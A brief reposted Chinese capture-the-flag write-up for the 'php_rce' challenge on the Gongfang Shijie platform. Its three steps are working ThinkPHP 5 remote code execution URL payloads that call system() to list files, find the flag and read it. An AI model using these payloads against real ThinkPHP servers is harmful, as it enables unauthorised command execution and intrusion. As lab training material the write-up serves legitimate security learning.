攻防世界-web-高手进阶区003-php_rce
Posted joker0xxx3
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界-web-高手进阶区003-php_rce相关的知识,希望对你有一定的参考价值。
1.thinkphp5 rce漏洞,构造payload,
?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27
2.寻找flag
?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name \'flag\'");%27
3.查看flag
?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27
4.漏洞详情可查看,https://blog.csdn.net/qq_40884727/article/details/101452478
以上是关于攻防世界-web-高手进阶区003-php_rce的主要内容,如果未能解决你的问题,请参考以下文章